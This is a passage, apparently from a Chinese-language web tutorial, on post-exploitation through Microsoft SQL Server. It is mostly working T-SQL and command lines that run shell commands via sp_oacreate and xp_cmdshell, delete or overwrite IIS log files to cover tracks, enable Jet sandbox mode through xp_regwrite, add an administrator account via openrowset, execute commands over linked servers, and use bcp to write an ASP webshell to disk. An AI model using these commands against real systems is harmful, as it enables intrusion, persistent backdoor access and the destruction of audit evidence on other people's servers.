(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)首先开启jet沙盘模式,通过扩展存储过程xp_regwrite修改注册表实现,管理员修改注册表不能预防的原因。出于安全原因,默认沙盘模式未开启,这就是为什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER权限,为了方便,这里建议使用sysadmin权限测试: ? exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
注:
0 禁止一切(默认)
1 使能访问ACCESS,但是禁止其它
2 禁止访问ACCESS,但是使能其他
3 使能一切
? 这里仅给出sysadmin权限下使用的命令: select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
? 建立链接数据库'L0op8ack'参考命令: EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
? 如何使用链接数据库:
使用这个方式可以执行,但是很不幸,DB_OWNER权限是不够的,需要至少sysadmin权限或者securityadmin+setupadmin权限组合
sp_addlinkedserver需要sysadmin或setupadmin权限
sp_addlinkedsrvlogin需要sysadmin或securityadmin权限
最终发现,还是sa权限或者setupadmin+securityadmin权限帐户才能使用,
一般没有哪个管理员这么设置普通帐户权限的
实用性不强,仅作为一个学习总结吧
大致过程如下,如果不是sysadmin,那么IAS.mdb权限验证会出错,
我测试的时候授予hacker这个用户setupadmin+securityadmin权限,使用ias.mdb失败
需要找一个一般用户可访问的mdb才可以:
? 新建链接服务
器‖L0op8ack‖:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
? exec sp_addlinkedsrvlogin 'L0op8ack','false';--或 exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';-- ? select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');-- ? exec sp_droplinkedsrvlogin 'L0op8ack','false';--
? exec sp_dropserver 'L0op8ack';--
再考贝一个其它文件来代替7.18日文件: (1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt' (2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END (3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
9、 用update来更新表中的数据:
ame='
32位MD5值为: ,密码为
10、 利用表内容导成文件功能
SQL有BCP命令,它可以把表的内容导成文本文件并放到指定位置。利用这项功能,我们可以先建一张临时表,然后在表中一行一行地输入一个ASP木马,然后用BCP命令导出形成ASP文件。
命令行格式如下:
bcp "select * from temp " queryout c:\inetpub\–c –S localhost –U sa –P upload('S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,最终上传了一个runcommand.asp的木马)。
上一篇:百事通成绩查询网址
下一篇:浙江树人大学教务管理系统外网登录